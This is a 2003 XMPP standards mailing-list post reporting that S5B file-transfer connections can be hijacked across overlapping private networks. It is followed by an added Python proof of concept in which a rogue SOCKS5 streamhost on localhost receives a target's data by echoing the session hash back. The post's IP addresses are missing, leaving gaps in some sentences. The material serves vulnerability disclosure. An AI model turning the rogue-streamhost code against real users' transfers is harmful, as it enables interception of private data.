[standards-jig] S5B vulnerability

Justin Karneges justin-keyword-jabber.093179 at affinix.com
Sun Dec 7 05:52:13 UTC 2003

It seems that it is possible to hijack a connection rather easily with S5B 
when there are two private networks involved.

Network 1 - external:, internal: 192.168.0.x
Client A -

Network 2 - external:, internal: 192.168.0.x
Client B -
Client C -

Client A wishes to contact Client B, and sends an S5B iq packet containing and as streamhosts.  Client C, the attacker, 
simply needs to set his machine's IP address to the same as Client A.  When 
Client B tries to connect to, it will end up connecting to the 
attacker.  Because the SOCKS authentication is not mutual, the attacker does 
not have to worry about providing any credentials to the target.

Please correct me if I am wrong.
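The exchange described above, as an added example that is not part of the original post or of any S5B implementation: Client B (the target) performs the XEP-0065 SOCKS5 handshake against the streamhost address it was given, and a rogue streamhost (Client C) answers it. The clash of IP addresses in the post is simply stood in for by pointing B at C's listener on localhost; the SID, JIDs and payload are constructed sample values. Per XEP-0065 the DST.ADDR is the hex SHA-1 of SID + initiator JID + target JID, which C does not need to know, because it only has to echo back whatever B asks for.

```python
import hashlib
import socket
import threading

# Constructed sample session values; not taken from the original post.
SID = "vxf9n471bn46"
INITIATOR_JID = "clienta@example.com/home"   # Client A
TARGET_JID = "clientb@example.com/work"      # Client B
PAYLOAD = b"file contents meant for Client A only"


def dst_addr(sid, initiator, target):
    """XEP-0065 DST.ADDR: hex SHA-1 of SID + initiator JID + target JID.

    A session identifier, not a secret: every input travels in the clear
    in the <iq/> offer, and the streamhost never has to produce it itself.
    """
    return hashlib.sha1((sid + initiator + target).encode()).hexdigest()


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed early")
        buf += chunk
    return buf


def rogue_streamhost(listener, results):
    """Client C: answers the SOCKS5 handshake knowing nothing about the session.

    The server side proves nothing about itself; it accepts 'no auth',
    echoes the requested DST.ADDR back, and then receives the stream.
    """
    conn, _ = listener.accept()
    with conn:
        ver, nmethods = _recv_exact(conn, 2)
        methods = _recv_exact(conn, nmethods)
        if ver != 5 or 0x00 not in methods:
            conn.sendall(b"\x05\xff")                 # no acceptable method
            return
        conn.sendall(b"\x05\x00")                     # "no authentication required"
        ver, cmd, _rsv, atyp = _recv_exact(conn, 4)
        if ver != 5 or cmd != 1 or atyp != 3:         # expect CONNECT to a DOMAINNAME
            conn.sendall(b"\x05\x07\x00\x01" + b"\x00" * 6)  # command not supported
            return
        dlen = _recv_exact(conn, 1)[0]
        domain = _recv_exact(conn, dlen)
        _recv_exact(conn, 2)                          # DST.PORT (0 in XEP-0065)
        # Echo DST.ADDR back as BND.ADDR: no knowledge of SID or JIDs needed.
        conn.sendall(b"\x05\x00\x00\x03" + bytes([dlen]) + domain + b"\x00\x00")
        results["dst_addr"] = domain.decode()
        chunks = []
        while True:                                   # read until B closes
            chunk = conn.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
        results["payload"] = b"".join(chunks)


def target_connect(host, port, payload):
    """Client B: connects to the advertised streamhost and pushes the data.

    Every check here is about SOCKS5 framing; nothing in the exchange lets
    B confirm that the listener at host:port actually belongs to Client A.
    """
    addr = dst_addr(SID, INITIATOR_JID, TARGET_JID).encode()
    with socket.create_connection((host, port)) as s:
        s.sendall(b"\x05\x01\x00")                    # VER=5, one method: no auth
        ver, method = _recv_exact(s, 2)
        if ver != 5 or method != 0:
            raise ConnectionError("streamhost refused the no-auth method")
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(addr)]) + addr + b"\x00\x00")
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        if ver != 5 or rep != 0:
            raise ConnectionError("CONNECT failed, REP=%d" % rep)
        if atyp == 1:                                 # IPv4 BND.ADDR + BND.PORT
            _recv_exact(s, 4 + 2)
        elif atyp == 3:                               # DOMAINNAME + BND.PORT
            _recv_exact(s, _recv_exact(s, 1)[0] + 2)
        elif atyp == 4:                               # IPv6 BND.ADDR + BND.PORT
            _recv_exact(s, 16 + 2)
        s.sendall(payload)                            # stream goes to whoever answered
    return addr.decode()


def run_hijack_demo():
    """Stand-in for the IP clash in the post: B is simply pointed at C's listener."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    results = {}
    t = threading.Thread(target=rogue_streamhost, args=(listener, results))
    t.start()
    results["requested"] = target_connect("127.0.0.1", listener.getsockname()[1], PAYLOAD)
    t.join()
    listener.close()
    return results


if __name__ == "__main__":
    r = run_hijack_demo()
    print("attacker received %d bytes for session %s" % (len(r["payload"]), r["dst_addr"]))
```

Running it shows the whole payload landing at the rogue streamhost. The only thing the rogue had to get right was the SOCKS5 framing; the DST.ADDR hash, which is the one session-specific value in the handshake, is supplied by the target and merely echoed back, so it identifies the session but authenticates neither end.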

